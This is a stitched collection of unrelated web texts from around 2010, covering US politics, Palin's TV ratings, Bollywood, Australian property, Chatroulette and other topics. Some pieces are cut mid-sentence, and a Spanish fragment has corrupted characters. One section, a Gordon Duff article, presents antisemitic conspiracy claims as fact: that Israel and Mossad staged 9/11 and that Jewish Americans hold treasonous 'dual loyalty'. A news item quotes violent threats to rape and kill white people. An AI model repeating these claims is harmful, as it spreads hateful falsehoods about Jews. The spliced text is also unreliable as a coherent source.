And to think , the GOP could have had former South Carolina Republican Party chair Katon Dawson as their big boss .
But that ’s not what the Republican Party choose to do .
They went for the black guy instead of the guy who has been a member of an all - white , no -Jews country club in the Midlands of the Palmetto State .
Clearly , they made the right choice .
( OK , neither would have been the right choice .
Steele ’s coronation was nothing more than a knee - jerk reaction to the election of President Barack Obama . )
This dust up over Steele is n’t good for the GOP .
But there ’s something far worse on the horizon : a very nasty party split .
And it has everything to do with the Tea Party , Ron Paul , and preserving the status quo in the Republican Party .
Right now , the GOP bigwigs are willing to court the folks that comprise the loose coalition that is the Tea Party .
Listen to Hannity , Rush , or any of the others — and they ’ll sing the praises of the Tea Party … at least for now .
But the day is coming when that will change .
Hannity , for one , has seen the writing on the wall .
And it scares him .
Why ?
Hannity ’s a supporter of business - as - usual , big - government folks like Mitt Romney , Newt Gingrich , and the newly elected Sen. Scott Brown , guys that the Tea Party , if they stand on principal , should be against .
The Fox News host even devotes an entire chapter in his new book Conservative Victory to the Tea Party and one possible outcome of the grassroots political movement .
It ’s title ?
“ To Be or Not to Be : A Third Party ? ”
He brings up the failed third party candidacy Ross Perot as an example :
My purpose is n’t to bash Ross Perot , who is a great American .
It ’s to illustrate that third - party movements can be very different from what they appear — and that difference sometimes does n’t come to light until the election is over and it ’s too late .
The Perot movement was propelled by outrage over government waste and complexity , but if it had attained power and begun trying to implement its ideas , the result would have been utter chaos .
But the greatest danger of a third - party movement is n’t necessary what happens if they attain office .
It ’s what can happen if they gain enough momentum to siphon away votes from the party they ’re more closely aligned with .
After all , what was the most lasting contribution the Perot movement made to American politics ?
No , it was n’t his stance on NAFTA , or his interest in updating the Constitution , or even his idea of the ‘ electronic town hall . ’
No , it was that he inadvertently delivered the White House to Bill Clinton .
Hannity ’s solution ?
When the time comes , the folks in the Tea Party need to get off the streets , put an end to their protests , come back inside the not - so big tent of the Republican Party , and vote for who their masters in the GOP tell them to vote for .
Hmm .
I do n’t see that going so well .
See , the future of the Republican Party belongs to two men right now , Ron Paul and Jim DeMint , both of whom are more closely aligned with the Tea Party than any other nationally recognized members of the GOP .
And that both are n’t on Hannity ’s short list of GOP presidential contenders speaks volumes .
Think about it folks :
What happens in 2012 when the Republican Party chooses Mitt Romney , or heaven forbid , Newt Gingrich , over Ron Paul or Jim DeMint , who seems increasingly likely to make a presidential run , especially after his announcement that he will limit himself to two terms in the Senate .
Yeah , I ca n’t imagine the Tea Partiers enthusiastically jumping behind either Romney or Newt .
They may vote for the GOP candidate in the presidential race , but they wo n’t turn out in force .
So the GOP is in a tough spot .
Either they pick a Paul or DeMint or they see their numbers drop in 2012 .
Ooops .
It turns out that people just were n't that interested in Sarah Palin 's big April Fools '
Day debut .
As a refresher , last week Palin launched a new show called " Sarah Palin 's Real American Stories . "
( Get it ?
Sarah Palin's a real American ! )
The show , marketed as a one - night special with hints that it could return from time to time in the future , launched in the 10 pm timeslot normally held by Greta Van Susteren .
( Greta 's husband is a big Palin backer . )
Though Palin's new show did manage to win the 10 pm timeslot , as is typical for Fox , her ratings were significantly down compared to Van Susteren -- even though Palin 's broadcast was a much - hyped special .
The numbers ( emphasis added ) :
" Real American Stories " delivered 2.073 million Total Viewers and 472k A25 - 54 viewers , down 10 % versus last Thursday among Total Viewers and down 28 % in A25 - 54 .
For all Thursdays in March 2010 , the " Stories " premiere was down 10 % among Total Viewers and down 19 % in A25 - 54 .
Looking at quarter hour data , " Real American Stories " shed viewers from start to finish -- down 18 % among Total Viewers ( 2.319 mm vs. 1.895 mm ) and down 22 % in A25 - 54 ( 533 k vs. 418k ) from the program 's first to its final quarter hour .
Those last stats are striking :
At least 1 out of every 5 viewers who started out watching the show changed the channel or turned off the set .
People may love talking about Sarah Palin , but even on Fox , they just do n't like watching her .
The sharp viewer drop - off is a perfect example of the Palin Paradox : if it were n't for television , Sarah Palin would be an absolute zero -- nobody would care about her at all .
But at the same time , the more she goes on television , the worse her image gets .
The medium that created her could ultimately destroy her .
Maybe she should think about sticking to Facebook and Twitter .
But if she only did that , would anybody care ?
More discussion of Palin 's awesome ratings is taking place in Socratic Method 's recommended diary .
16 . The Bread And Beer Band LP , 1969 .
This was a session - band set recorded by Elton John back when he was still called Reg Dwight .
It ’s a vaguely funky album which Decca delined to release , and which the band put out on their own label in a handmade sleeve .
Value : £ 2000 .
Supporters of white supremacist Terreblanche protest yesterday as his alleged killers appear in cour
The official probe was launched into a group set up by alleged supporters of firebrand politician Julius Malema .
One entry , emailed to football fans around the world , calls for the “ rape and slaughter ” of whites and the murder of President Jacob Zuma .
In a chilling message a Malema “ fan ” called Thato Mbateti Mbateti warns : “ Every trespasser , namely white whores , we will rape them and kill them ...
White kids will be burned . ”
The campaign comes amid growing tensions in South Africa after the murder of white supremacist Eugene Terreblanche .
Yesterday angry crowds clashed outside a court in Ventersdorp , near Johannesburg , as two black farm workers , aged 15 and 21 , appeared accused of killing the 69 - year - old who had campaigned for all - white states within South Africa .
Bitter memories of the apartheid era were evoked when 2,000 people gathered and police used razor wire to separate the factions .
The case was adjourned until next week .
DR ALAN SABROSKY , FORMER DIRECTOR OF STUDIES AT THE US ARMY WAR COLLEGE
“ ISRAEL DID IT ”
By Gordon Duff STAFF WRITER / Senior Editor
Meet Dr. Alan Sabrosky , a brave man , a USMC Vietnam vet , an American of Jewish ancestry and someone devoted to the security of the United States at any cost .
Ask any Jew what it takes to stand up against the most powerful and ruthless group in the world , the Israeli lobby inside the United States .
VIEW COMPLETE VIDEO INTERVIEW AT THE END OF THE ARTICLE
[ youtube lGYNg6abWIc ]
Sabrosky has been calling for a new 9/11 investigation for some time .
What makes him unique is that we have a Jew who can hardly be called “ self - hating ” or “ anti-Semitic ” or against Israel .
He is consistent in everything he says .
His point is that you are an American or you are an Israeli but you ca n’t be both , especially now with Zionism turning Israeli foreign policy into a “ runaway train . ”
9/11 , as Sabrosky sees it was the watershed in a relationship between America and Israel that has gone from bad to unsurviveable , especially for America .
He contents that AIPAC exercises near total control over the electoral process in America through the ability to outspend any other group and destroy anyone who stands against them .
The unwillingness of the US to stand with the international community on humanitarian and war crime issues where Israel is found in continual violation is , to Sabrosky , a critial issue .
In discussion the US and her lack of support for the Goldstone Report , Sabrosky says :
US criticism of the HRC resolution should be disregarded , as Washington only parrots Israel ’s wishes here …
… it might have been better to have included Goldstone ’s condemnation of Hamas offenses as well , but it is legitimate as it stands for five reasons : ( 1 ) Israel committed the great majority of the violations ; ( 2 ) Israel had an overwhelming preponderance of military power ; ( 3 ) Palestinians suffered almost all of the death and destruction ; ( 4 ) Israel has a long , sordid history of ignoring UN commissions and resolutions , and of attacking UN facilities and killing UN staff , as when the clearly marked UNRWA facility in Gaza was bombed ; and ( 5 ) the HRC focus is properly on the actions of the oppressor ( Israel ) and not on those of the oppressed ( the Palestinians ) .
Another is that it did not accord Israel the right of self - defense .
But Israel ’s claim to self - defense in its savaging of Gaza is specious , because Israel — like all occupiers and oppressors — has no inherent right of self - defense against its victims .
Who , for instance , would have accepted Nazi Germany ’s assertion that its brutal reprisals against the Czechs for their assassination of a Nazi commander named Reinhard Heydrich was an exercise in self - defense ?
No one , and no one should accept Israel ’s claim , either .
A third is that holding Israel accountable for its actions will somehow endanger the Middle East peace process .
But there is no peace process , simply meaningless discussions to the dead end ( for Palestinians and the rest of the region ) of Israeli hegemony , and under Netanyahu or any electable government in Israel , there is not and can not be one .
There will be an enforced peace imposed from outside of the Middle East , over the objections and obstruction of Israel , or there will be none at all .
ZIONISM AND ISRAELI NATIONALISM
This is how Sabrosky describes the nature of Jewish nationalism as described within the term we call “ Zionism ” :
The differences between Jewish nationalism ( Zionism ) and that of other countries and cultures here I think are fourfold :
1. Zionism is a real witches ’ brew of xenophobia , racism , ultra-nationalism and militarism that places it way outside of a “ mere ” nationalist context — for example , when I was in Ireland ( both parts ) I saw no indication whatsoever that the Provisional Irish Republican Army or anyone else pressing for a united Ireland had a shred of design on shoving Protestants into camps or out of the country , although there may well have been a handful who thought that way — and goes far beyond the misery for others professed by the Nazis ;
2. Zionism undermines civic loyalty among its adherents in other countries in a way that other nationalist movements ( and even ultra- nationalist movements like Nazism ) did not — e.g. a large majority of American Jews , including those who are not openly dual citizens , espouse a form of political bigamy called “ dual loyalty ” ( to Israel and the US ) that is every bit as dishonest as marital bigamy , attempts to finesse the precedence they give to Israel over the US ( lots of Rahm Emanuels out there who served in the Israeli army but NOT in the US armed forces ) , and has absolutely no parallel in the sense of national or cultural identity espoused by any other definable ethnic or racial group in America — even the Nazi Bund in the US disappeared once Germany and the US went to war , with almost all of its members volunteering for the US armed forces ;
3 . The “ enemy ” of normal nationalist movements is the occupying power and perhaps its allies , and once independence is achieved , normal relations with the occupying power are truly the norm , but for Zionism almost everyone out there is an actual or potential enemy , differing only in proximity and placement on its very long list of enemies ( which is now America ’s target list ) ; and
4. Almost all nationalist movements ( including the irredentist and secessionist variants ) intend to create an independent state from a population in place or to reunite a separated people ( like the Sudeten Germans in the 1930s ) — it is very rare for it to include the wholesale displacement of another indigenous population , which is far more common of successful colonialist movements as in the US — and perhaps a reason why most Americans would n’t care too much about what the Israelis are doing to the Palestinians even if they DID know about it , is because that is no different than what Europeans in North America did to the Indians / Native Americans here in a longer and more low - tech fashion .
Sabrosky is one of the few Americans who sees the nuclear threat of Israel as it is , blackmailing the United States , not only in how it could be used to draw America into an unwanted war , but how it could actually be used at some point to attack the United States itself .
Only recently , Israel put Western Europe on notice that it would be attacked if its actions threatened Israel , attacked by nuclear weaons from Israel without warning .
Martin van Creveld ’s threat combined with Sabrosky ’s analysis of Israeli intentions and culpability for 9/11 brings to mind something Sabrosky had once written .
He has always seen Moshe Dyan as a hero .
Dyan saw Israel ’s military role as that of a “ junk yard dog , ” ready to bite without warning , attack anything and anyone .
Sabrosky notes that , eventually such an animal is always put down or as he puts it , “ the preferred response of everyone else is to kill that mad dog before it can decide to go berserk and bite . ”
9/11
Sabrosky makes a case , not just for a coverup of 9/11 but goes much further .
He points out as do so many that the physics of the attack are unworkable .
He , however , is one of the few to point to a conclusion many find obvious but few have the nerve to admit , that it would have been impossible to stage 9/11 without the full resources of both the CIA and Mossad and that 9/11 served the interests of both agencies quite well .
There was nothing they could have wished for more .
Sabrosky also makes a point involving media coverage of 9/11 :
Finally , we need to take a hard look at why the mainstream media ( MSM ) have paid more attention to Sarah Palin ’s wardrobe than they have to dissecting blatant falsehoods , discrepancies and inconsistencies in the US Government ’s treatment of 9/11 and its aftermath .
ZIONISM AND TREASON
The inescapable point isnt the 60,000 Americans killed or wounded in a war started out of treason or the world it threatens to destroy .
Americans have been looking away from these glaring realities the way they looked away from Vietnam .
Sabrosky leaves Israel and her American Jewish supporters who he sees as traitors with a warning :
If these Americans and those like them ever fully understand just how much of their suffering — and the suffering we have inflicted on others — is properly laid on the doorsteps of Israel and its advocates in America , they will sweep aside those in politics , the press and the pulpits alike whose lies and disloyalty brought this about and concealed it from them .
They may well leave Israel looking like Carthage after the Romans finished with it .
It will be Israel ’s own great fault .
Do we take Sabrosky seriously because he is a Marine or a Jew ?
Do we wonder why the things he says reach so few ?
Is American in a shooting war where our biggest enemy sits behind us , killing us off , robbing us blind and whispering gently in our ears how much they love us ?
It would seem so .
[ youtube HMsdNl_13 q4 ]
Author Details Author Details Gordon Duff , Senior Editor Gordon Duff is a Marine combat veteran of the Vietnam War .
He is a disabled veteran and has worked on veterans and POW issues for decades .
Gordon is an accredited diplomat and is generally accepted as one of the top global intelligence specialists .
He manages the world ’s largest private intelligence organization and regularly consults with governments challenged by security issues .
Duff has traveled extensively , is published around the world and is a regular guest on TV and radio in more than “ several ” countries .
He is also a trained chef , wine enthusiast , avid motorcyclist and gunsmith specializing in historical weapons and restoration .
Business experience and interests are in energy and defense technology .
Gordon ’s Latest Posts
First Indian film to feature a gay kiss , Dunno Y … Na Jaane Kyun , likely to spark controversy
This article is more than 10 years old
This article is more than 10 years old
The posters are ready , so is the film .
The only question is whether the Indian public is too .
Dunno Y … Na Jaane Kyun , a film featuring India 's first cinematic gay kiss , is scheduled to go on general release within weeks .
Already dubbed India 's answer to Brokeback Mountain it tells the story of an aspiring model who travels to Mumbai , India 's commercial and film capital , to seek his fortune and enters into a homosexual relationship , in part to further his career .
Trailers of the film have been well received by activists .
" It looks good , " said Ashok Row Kavi , editor of Bombay Dost , India 's first gay magazine .
It talks of the complexities [ of being gay ] in India .
Taboos are still very strong and hopefully it will change things . "
For decades Bollywood avoided graphic depictions of even heterosexual kisses , with films famously cutting away to images of budding flowers , breaking waves or crashing waterfalls at the crucial moment .
Earlier this year a film called Love , Sex … and Dhokha ( ditching ) which included relatively graphic scenes of heterosexual sex was released .
Though there was much media debate , the film generated little public outrage , encouraging those seeking to draw the largely formulaic Indian film industry in new directions .
However the most explicit sequences in the film were cut or altered by censors .
" The sexual revolution has been under way in Bollywood for half a decade , " said Anupama Chopra , film critic and author .
" Kissing is now fairly acceptable for most of the younger stars .
The younger directors are responding to an evolving audience . "
However homosexuality remains taboo .
The nearest Bollywood has got to portraying same - sex relationships so far is the 2008 film Dostana – which showed two straight men pretending to be gay to persuade a landlady to allow her beautiful daughter to be their housemate .
At the end of the film , as a punishment , they kiss .
" It was a comedy but did involve big names playing effeminate men on screen , " Chopra said .
Last week a gay film festival in Mumbai attracted big crowds .
" From India alone there are 25 films … I thought not many queer films were made in India , " the festival director , Sridhar Rangayan , told DNA newspaper .
The committee was careful about their selection however .
" We do n't want to hurt the Indian sensibility .
We had to discard 30 films for various reasons , " Rangayan said .
Gay activists fear Dunno Y will provoke a backlash from religious and political conservatives , many of whom opposed the recent effective repeal of colonial - era Indian laws that made homosexuality punishable by up to 10 years in prison as a crime " against nature " .
Promotional posters for Dunno Y … Na Jaane Kyun showing two semi- naked young men embracing did spark controversy last year .
The film 's director , Sanjay Sharma , told the BBC recently that Indian cinemagoers were " mature enough " to deal with the story line .
" At the moment I 'm not thinking about any political or censor problems , " Sharma said .
Sharma 's brother Kapil , who plays the lead , insisted that Indian audiences were ready to accept homosexuality on screen .
Change however is slow .
" We are still a very long way from seeing a mainstream major star play a gay role and that we wo n't see that soon , " Chopra said .
State lawmakers try to head off health bill
In a backlash against President Obama 's health care legislation that stretches from Virginia to California , lawmakers in more than two - thirds of the states are scrambling to undercut the bill before it even passes Congress .
Earlier this month , Virginia became the first state to pass a law allowing its residents to opt out of the proposed federal requirement that everyone have health insurance , a key element of Obama 's plan .
Legislatures in Utah and Idaho this month also approved measures limiting the scope of the proposed $ 950 billion health care bill pending in Congress .
A host of other state legislatures also are considering new laws and promoting constitutional amendments that would limit federal requirements .
Most follow Virginia 's lead in nullifying the mandate on health insurance .
Obama 's bill would expand health coverage to 31 million Americans who currently do n't have it and impose new regulations on the insurance industry .
The state measures are likely to be challenged in court , setting up new legal battles over whether federal law can trump state laws .
" If there are enough states or people refusing to comply … what 's the federal government going to do ? " says Michael Boldin of the Tenth Amendment Center , a non-partisan think tank in Los Angeles that advocates individual and states ' rights .
The federal mandate is designed to help reduce costs by bringing young , healthy people into the health insurance pool .
Opponents say it unfairly infringes on individual rights and freedom .
Some legal scholars say the state laws do n't stand a chance in court .
" These laws are sort of legally meaningless and meant to have a predominantly political impact , " says Wake Forest University law professor Mark Hall , an expert in health care law and policy .
He says federal laws typically trump state laws , making the health care efforts in the states little more than " a form of civil disobedience . "
States ' rights proponents are undaunted .
They say the recent victory in Virginia has only increased momentum for the proposals , all of which they intend to defend in court .
" Congress lacks constitutional authority to regulate commerce in a way that would compel individuals to purchase government - approved health insurance , " says lawyer Clint Bolick of the Goldwater Institute , a conservative think tank and law firm .
The issue goes to Arizona voters in November , when they will be asked to amend the state 's constitution to say that no " person or employer " can be compelled to participate in a health care system or insurance plan or pay a penalty for not participating .
Obama 's plan would impose penalties on individuals who do n't have health insurance and on some employers who do n't provide such coverage .
The Arizona measure passed the state Legislature in June .
Republican Rep. Nancy Barto , who sponsored the bill against the federal mandate in the state House , says she expects the ballot initiative to pass — and she expects a legal challenge .
" We are ready to fight that battle for the sake of all the states that are doing this , " Barto says .
Among those also working on legislation or constitutional amendments : • Utah , where Republican Gov. Gary Herbert is considering whether to sign a bill requiring any state agency seeking to comply with a new federal health care law to first ask lawmakers for permission .
• Idaho , where Republican Gov. Butch
Otter is expected to sign a bill that says " every person within the state of Idaho is and shall be free to choose or decline to choose any mode of securing health care services without penalty or threat of penalty . "
• Florida , where lawmakers are proposing a constitutional amendment that would forbid any federal law from requiring any " person , employer or health - care provider to participate in any health care system . "
• Louisiana , where a proposed law would make it a misdemeanor with a $ 500 penalty for any state or local official who " attempts to coerce any individual to purchase health insurance . "
State Sen. A.G. Crowe , a Republican , has asked the Louisiana attorney general to consider suing the federal government for " unnecessary intrusion . "
Richard Cauchi of the National Conference of State Legislatures says it 's too soon to say whether a majority of states will follow through and pass new laws or adopt constitutional amendments .
Proponents should know by the end of May whether their movement " has legs , " he says , because by then , only a dozen state legislatures will still be in session .
Contributing : John Fritze Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
When asked if it was a good time to buy an investment property , 67 per cent agreed that it was because the supply shortage would support rental and price yields .
Another 21 per cent thought prices would stagnate and only 12 per cent believed that prices would fall .
On the future of the boom , 32 per cent could see it running another year , 44 per cent for two or more years , and 7 per cent forever .
Contrary to recent years , respondents ranked Sydney as the strongest property market in the current cycle , followed by Melbourne , Brisbane , Perth , Adelaide , Canberra , Darwin and Hobart .
This is all scary stuff .
Investors played a key role in expanding the property bubble through the late 90s .
In 1990 investment loans represented 16 per cent of Australian mortgages at $ 13 billion .
By 2008 that figure had ballooned 2400 per cent to $ 310 billion , or 31 per cent of total mortgages .
Investor attitudes matter .
Despite 71 per cent of investors hypothetically believing there could be a property crash , the more common attitude is that other factors will keep the momentum going .
They rank the following factors in order of importance : housing shortages ; low interest rates ; foreign purchases of Australian property ; speculative fervour ; negative gearing and moral hazard .
The survey revealed , however , that moral hazard may be much larger than investors themselves admit , with 42 per cent expecting the Rudd Government to introduce another round of first home buyer grants if the current boom shows signs of ending .
The increase in foreign purchases also cannot be under estimated , following the decision last March by the federal government to relax its rules on property ownership .
This abolished mandatory reporting of such acquisitions in a bid to ''e nhance flexibility in the market ' ' .
Before the change , foreign investment in Australian residential property had already started increasing , up 33 per cent to $ 20.4 billion .
It is not known what the figures stand at in 2010 but there are suggestions that more than 30 per cent of homes auctioned are purchased by foreign speculators .
If this is the case , it will dramatically add to the property bubble .
It is a potential political time bomb .
Numerous readers have written in complaining that they are being priced out of the market by overseas bidders .
One Investor Pulse reader wrote recently : “ It would explain the highly overpriced market and the reason why local wages are not enough to purchase the average house .
To rely on high immigration to keep the economy temporarily out of trouble is one thing , but allowing this foreign speculation to keep Australians out of their own market should be opposed with urgency . ”
Another Investor Pulse reader wrote : “ So much for Rudd's ' working families ' .
Australians should get priority over foreign investors for what limited housing we have .
How can Australians compete when Chinese borrow at home at 1 per cent ?
The Australian property market is strong and does n't need to be propped up .
The Government should act now to stop this misguided and UN - Australian policy .
Shame on you , Mr Rudd , for selling out on Working Families . ”
Investors are divided on possible solutions to the outsized price rises .
A majority , 54 per cent , are against interest rate rises .
When it comes to government policy , investors ranked cutting stamp duty as their best solution , just ahead of building more public housing and re-limiting foreign investment .
Cutting immigration and negative gearing ranked lower .
Another solution was also clear in the fact that 52 per cent of investors admitted they would reconsider the value of an investment property if the government reversed the 1999 capital gains tax cuts .
Investors clearly acknowledged the need for government intervention with 91 per cent seeing no solution coming from the private sector .
Half reckoned banks will not lend to developers because their exposure to mortgages is already too high .
Most of the other half agreed rather with the statement that the banks see the risk in overvalued prices and want to keep the market tight .
There was little sympathy for younger Australians with 55 per cent of investors agreeing first - home buyers were best off saving a deposit to get into the property market and 24 per cent suggesting the young could buy on the city fringe .
Loading
Another 27 per cent of surveyed investors already owned an investment property and 16 per cent were are seriously considering buying one .
Ammaiya Services
Pvt Ltd is all about designing spontaneous , fresh , eye - catching , and clean websites for intelligent businesses .
Ammaiya Services
Pvt Ltd , an India based web design and development company is famous globally for delivering solutions of incredible nature .
We are an energetic , young and experience - rich agency that offers a range of flawless IT solutions .
Since 2004 , we have crafted commendable custom sites of high sophistication and unmatched digital creativity to businesses of varying nature .
We are also an offshore outsourcing firm that has delivered paramount web design solutions to innumerable prestigious brands all across the globe .
Subsequently , we host an extensive list of ' happy clientele ' in the United Kingdom , United States of America , Australia , Germany , Switzerland , Ontario , Vancouver and more .
Read More
Ammaiya's Vision At Ammaiya Services Pvt Ltd , we aspire to stand above as the most prestigious company in Branding , IT and Multimedia service sectors across the world .
To achieve our end goals , we drive our dedicated focus to : Boost our customer satisfaction by successfully accomplishing their business core requirements .
Deliver proved and innovative solutions of unmatched esteemed levels .
Adhere to reputed professional standards that are globally exercised .
Ammaiya's Mission
Our mission is not just to fulfill our customer requirements , but to surpass their expectations with our bestowed dedication and passion .
We aspire to convert technological expertise to proven business growth .
To achieve paramount levels of excellence we relentlessly focus on : People – Building a robust team with top talent from all parts of the world .
Technologies – Employing innovative strategies based on stringent professional standards at cost - cutting norms .
Customer – Ensuring that our clients are served with high satisfactory levels without compromising on quality .
Read More
...he imagined substituting for all the clocks of Europe a more honest machine , a finely threaded spiral of three dimensions , that would signify not only the coming and going of day and night , but that no single day and no single night would ever return .
-- Mark Helprin
Continental Airlines Inc. and UAL Corp.'s United Airlines are expected to announce Monday that they are merging to form the world 's largest airline , people familiar with the matter said .
UAL 's board of directors is meeting Friday , while Continental 's board is meeting Friday and Sunday to discuss the deal , these people said .
These people cautioned ...
La orden se da un d�a despu�s de que el gobernador Bill Richardson anunciara que hab �a pedido el env�o de m�s agentes de seguridad a la zona , tras el homicidio de un ranchero de Arizona
Dallas | Mi�rcoles 31 de marzo de 2010
Notimex | El Universal
20:07
Is there a " Cow Tunnel " somewhere beneath 12th Avenue right now , just waiting for landmark designation ?
According to Edible Geography , historian Betty Fussel discovered that cattle traffic was so heavy in the 1870s that a tunnel was built to increase the flow to slaughterhouses along 12th Avenue and 34th Street .
The underground passages were eventually made redundant when refrigerated train cars were introduced , but they 're rumored to still be there !
There 's one reference to the tunnel from 1997 , when author Brian Wiprud wrote about " watching a crew install a drainage basin on Greenwich Street when they came upon a wall of wood about ten feet down .
A laborer went into the hole with a torch and came out saying it was an oak - vaulted tunnel ten feet wide by eight feet high that trailed off an undetermined distance in either direction .
It was then that an old man from the neighborhood stepped up to the trench and said , ' Why , I see you found the cattle tunnel . ' "
The DoT and NYCT were pointing us towards dead ends ... but we still wanted to believe .
So after some more digging , we found a PDF from 2004 showing a correspondence from the New York City Landmarks Preservation Commission and the New York State Office of Parks , Recreation , and Historic Preservation — the two agencies allegedly assessing the architectural and cultural uniqueness of the cattle tunnel .
On page 73 it says :
" The Manhattan Abattoir had a dock at the foot of West 34th Street in the 1870s , and cattle were brought to their slaughterhouse between Eleventh and Twelfth Avenues beneath the streets via a cow tunnel .
Sometime between 1928 and 1930 a two - story concrete cattle pen was built at the southeastern intersection of West 39th Street and Twelfth Avenue .
Another underground cattle pass was built from the shoreline to this pen to allow cows to be driven under , instead of across , Twelfth Avenue . "
The document lists two historical underground cattle passages from the 1870s that are listed as still being in existence , one at West 34th Street and another at West 38th Street , both along 12th Avenue .
And in 2004 the agencies noted , " Given their potential distinctiveness as some of the few remaining subsurface features representing the 20th century meat industry in Manhattan , if intact , the cattle tunnels may meet the criteria for inclusion on the National Register of Historic Places . "
We checked in with the LPC to find out what 's taking so long , and will update when / if we hear back .
“ Ironic , is n’t it ? ” said Michael Braungart , the German chemist who co-wrote “ Cradle to Cradle , ” the best - selling sustainable design book , and co-founded the U.S. design consultancy McDonough Braungart Design Chemistry .
“ The color green can never be green , because of the way it is made .
It ’s impossible to dye plastic green or to print green ink on paper without contaminating them . ”
Image Models walked around an iceberg for Chanel ’s show at Paris Fashion Week .
Credit ... Ian Langsdon / European Pressphoto Agency
This means that green - colored plastic and paper cannot be recycled or composted safely , because they could contaminate everything else .
The crux of the problem is that green is such a difficult color to manufacture that toxic substances are often used to stabilize it .
Take Pigment Green 7 , the commonest shade of green used in plastics and paper .
It is an organic pigment but contains chlorine , some forms of which can cause cancer and birth defects .
Another popular shade , Pigment Green 36 , includes potentially hazardous bromide atoms as well as chlorine ; while inorganic Pigment Green 50 is a noxious cocktail of cobalt , titanium , nickel and zinc oxide .
If you look at the history of green , it has always been troublesome .
Revered in Islamic culture for evoking the greenery of paradise , it has played an accident - prone role in Western art history .
From the Italian Renaissance to 18th - century Romanticism , artists struggled over the centuries to mix precise shades of green paint , and to reproduce them accurately .
Even if they succeeded , the results often faded or discolored , as did green dyes .
When the 19th - century British designer William Morris created wallpapers inspired by medieval tapestries , he copied the blue hues in the originals .
But most of those “ blues ” were really greens , which had changed color over the years .
This strip is basically a theory that I ’ve had for a while –scientists really hate mice .
Why else would you go into a field that spends a large amount of time torturing the poor creatures ?
Oh , sure , to save lives , but not mouse lives .
Look people , I ’m not saying it ’s wrong , but there is certainly no denying that scientists just really want to kill mice .
I like that the mice are asking the audience for help .
What have you done ?
Is Chatroulette a sign of internet punk ?
Bill Thompson is pleased to see the punk ethic alive and well online
Anyone with a few minutes to spare online might enjoy visiting Chatroulette - the finest expression of punk mentality from the emerging internet generation that I 've yet come across .
It 's not hard to play , as there are only three rules .
You have to be aged 16 or over .
You 're asked to " please stay clothed " .
And you can alert the management by clicking F2 " if you do n't like what you see " .
Click ' New Game ' to start a game , give the service access to to your camera and microphone and you begin a video conversation with a random stranger .
That 's it .
Chatroulette uses Adobe Flash to turn on the camera and microphone on a visitor 's computer and register their IP address with the site .
It then connects that user with another , random IP address and opens up a connection between the two , so you can start to chat .
Causing a stir Even though it 's getting millions of users , Chatroulette is very scalable because , like the original Napster , the data does n't actually go through the Chatroulette site itself .
Instead it uses
Flash 's peer - to - peer streaming service to make a direct link between the two computers and only has to keep track of the IP addresses and " next " calls .
The kids have arrived online and they want to shape it in their image
Bill Thompson
It is also causing an enormous fuss , largely because it is unmediated , requires no registration or verification and is open to every exhibitionist , deviant and random stranger online .
My son reckons he is getting a ratio of 14 naked men to one worthwhile conversation , which sounds about right for a service that is intended to do for video chat what Twitter has done for communication in 140 characters or less , and show us the real potential of the unfettered connectivity that the internet makes possible .
Of course it 's a scandal , and of course it is potentially corrupting and dangerous , though the random nature of the connection and the lack of any way to choose who you talk to mean that the chances of coming across someone in the same country never mind the same city or town are vanishingly small .
Yes , someone could use it to make contact by writing their email address or phone number on a card or calling it out as soon as a connection is made , but you 'd have to be pretty stupid to think of this as a reliable way to make new friends or find victims .
Punk personified
The point about Chatroulette is that is has no point , that it strips away the wooden panelling from this finely modelled room we call the internet to reveal all the workings beneath and show that in the end it 's just a space for making connections between people .
It reminds me of the day in 1977 when I went into the sixth form common room at Southwood Comprehensive School in Corby and my mate Dougie Gordon played me his newly - arrived copy of God Save The Queen and everything I thought I knew about politics , music and revolution coalesced around the Sex Pistols into a punk sensibility that has stayed with me ever since .
Chatroulette is a pure expression of that punk spirit , delivered through the tools available to today 's teenagers rather than the electric guitar and seven - inch single of my childhood , and the anger with which it has been received by the establishment is a testament to its disruptive potential .
The kids have arrived online - Chatroulette creator Andrey Ternovskiy is the same age as the Mosaic browser - and they want to shape it in their image .
I hope they pull it off , though in another echo of punk history Ternovskiy is already being wooed by the majors to sign up and sell out , and the temptation to turn his rebellion into money must be intense .
Rather like Jimmy , the punk - precursor hero of The Who's Quadrophenia , he is under pressure to conform from his parents as his mother does n't like the way Chatroulette can be used .
Perhaps he will stay true to punk , like Joe Strummer of The Clash or Siouxsie Sioux .
Perhaps he 'll sell out like Johnny Rotten and we 'll see Chatroulette used to advertise butter .
But whatever may happen to his site the impact will be felt as other kids realise that they can pick up a keyboard and become punk programmers , just as my generation picked up a guitar and learned three chords .
Chatroulette 's launch was the day the net turned day - glo , and Poly Styrene and X Ray Spex would be so proud .
Bill Thompson is an independent journalist and regular commentator on the BBC World Service programme Digital Planet .
He is currently working with the BBC on its archive project .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
" To me , they 're beautiful , " she said .
" It 's what they symbolize .
We have something really creative and forward - thinking in our town , and it helps me to think we 're on the right track . "
What will my baby look like with a celebrity parent ?
Use our morph software to find out !
Facebook shut its
Lite site after just seven months
By Maggie Shiels
Technology reporter , BBC News , Silicon Valley
Initially the service was rolled out in the US and India Facebook has shut down its Lite site aimed at users with slow or poor internet connections .
The stripped down version of the original ran for around seven months .
Facebook posted a note on its own fan page thanking those who used Lite , adding that it had " learned a lot from the test of a slimmed - down site " .
" I think a lot of the Facebook experience was left out of Lite , especially the monetisable parts , " said Ray Valdes of Gartner Research .
" The other part of this decision is probably because they have improved the performance sufficiently with the main part of Facebook and made things run better that they did n't need this back - up approach to cover a situation of low performance , " Mr Valdes told BBC News .
The technology blog ReadWriteWeb.com had described the Lite site as a " Twitter - like experience " of the popular microblogging service because it offered a smaller number of features than the fully - fledged site .
The options on Facebook Lite were limited to letting users write on their wall , post photos and videos , view events and browse other people 's profiles .
There were no applications or special boxes .
" In some ways the Lite version was like using ad block on their own site - it stripped the site down to the very basics , " said Mike Melanson of ReadWriteWeb .
The change was announced on Facebook 's own profile page and offered few details as to why the service has been closed down .
" It would seem not enough people were using it but then there was not a lot of awareness about the product .
Tears will not be shed over the loss of Facebook Lite , " Nick O'Neil of AllFacebook.com told BBC News .
A number of commentators on the social media blog Mashable.com said that they used it because it was not blocked at their office while some said they thought it " would have been a nice support for low bandwidth nations " .
Bookmark with : Delicious
Digg
reddit
Facebook
